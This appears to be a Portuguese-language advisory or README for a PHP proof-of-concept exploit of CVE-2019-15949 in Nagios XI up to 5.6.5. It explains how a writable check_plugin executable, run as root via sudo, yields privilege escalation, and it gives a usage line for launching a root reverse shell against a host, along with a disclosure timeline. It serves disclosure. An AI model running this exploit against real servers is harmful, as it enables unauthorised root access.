
POC que explora uma vulnerabilidade no Nagios XI (5.6.5) para gerar um shell root.
Existe uma vulnerabilidade no Nagios XI <= 5.6.5 que permite a um atacante aproveitar um RCE para escalar privilégios para root.
O exploit requer acesso ao servidor como o usuário 'nagios', ou acesso CCM via interface web com permissões para gerenciar plugins.
O script getprofile.sh, invocado ao baixar um perfil do sistema (profile.php?cmd=download), é executado como root através de uma entrada sudo sem senha; o script executa o executável ‘check_plugin’ que pertence ao usuário nagios.
Um usuário conectado ao Nagios XI com permissões para modificar plugins, ou o usuário 'nagios' no servidor, pode modificar o executável ‘check_plugin’ e inserir comandos maliciosos executáveis como root.
Um POC em PHP foi desenvolvido e envia um payload que resulta em um shell reverso de root.
Uso:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
Relatado à Nagios em: 29 de julho de 2019
Confirmado pela Nagios em: 29 de julho de 2019
Corrigido na versão: 5.6.6 em: 20 de agosto de 2019
CVE atribuída em: 6 de setembro de 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)
